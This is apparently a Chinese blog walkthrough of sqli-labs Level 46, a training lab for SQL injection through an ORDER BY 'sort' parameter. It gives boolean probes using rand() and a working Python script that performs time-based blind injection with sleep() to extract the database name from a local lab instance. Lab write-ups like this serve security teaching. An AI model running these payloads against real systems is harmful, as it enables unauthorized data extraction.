sql-labs第46关 脚本盲注

我们直接可以从界面中得知传参的参数为SORT

查看源码

我们令参数即sort为1尝试输入:即 ?sort=1

令参数即sort为2

看到按照字母顺序进行了排序,所以使用了order by语句。

用 rand()盲注 这里首先假设给true以及false两个来观察回显

?sort=rand(true)

?sort=rand(false)

看到给的值为真以及假是不一样的,所以我们可以构造出一个布尔盲注或者延时盲注

?sort=rand(ascii(mid((select database()),1,1))>114)

用py脚本进行盲注

代码如下

python 复制代码
import requests
import time


def inject_database(url):
    name = ''
    for i in range(1, 20):
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
        	# 构造时间盲注
            payload = "if((ascii(substr(database(),%d,1))>%d),sleep(1),1)" % (i, mid)
            params = {"sort": payload}
            start_time = time.time()
            try:
                r = requests.get(url, params=params, timeout=20)
            except requests.Timeout:
                print("Request timed out.")
                continue
            end_time = time.time()
            if end_time - start_time >= 1:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
        if mid == 32:
            break
        name += chr(mid)
        print(name)


if __name__ == "__main__":
    url = 'http://127.0.0.1/sqllabs/Less-46/index.php'
    inject_database(url)

这里我们可以看到使用脚本代码爆出了数据库名

相关推荐
十碗饭吃不饱6 小时前
sql报错:java.sql.SQLSyntaxErrorException: Unknown column ‘as0‘ in ‘where clause‘
java·数据库·sql
我是Superman丶7 小时前
【优化】Mysql指定索引查询或忽略某个索引
数据库·mysql
程序定小飞7 小时前
基于springboot的在线商城系统设计与开发
java·数据库·vue.js·spring boot·后端
呆呆小金人7 小时前
SQL入门: HAVING用法全解析
大数据·数据库·数据仓库·sql·数据库开发·etl·etl工程师
LL_break7 小时前
Mysql数据库
java·数据库·mysql
野犬寒鸦7 小时前
从零起步学习Redis || 第十一章:主从切换时的哨兵机制如何实现及项目实战
java·服务器·数据库·redis·后端·缓存
倔强的石头_8 小时前
面向大数据架构的演进:为何 Apache IoTDB 是与生态无缝融合的理想之选?
数据库
Elastic 中国社区官方博客8 小时前
如何减少 Elasticsearch 集群中的分片数量
大数据·数据库·elasticsearch·搜索引擎·全文检索
Logintern098 小时前
只有通过Motor 获取 mongodb的collection,才能正常使用 async with collection.watch()监听集合变更
数据库·mongodb
huaqw009 小时前
Java17新特性解析深入理解SealedClasses的语法约束与设计哲学
数据库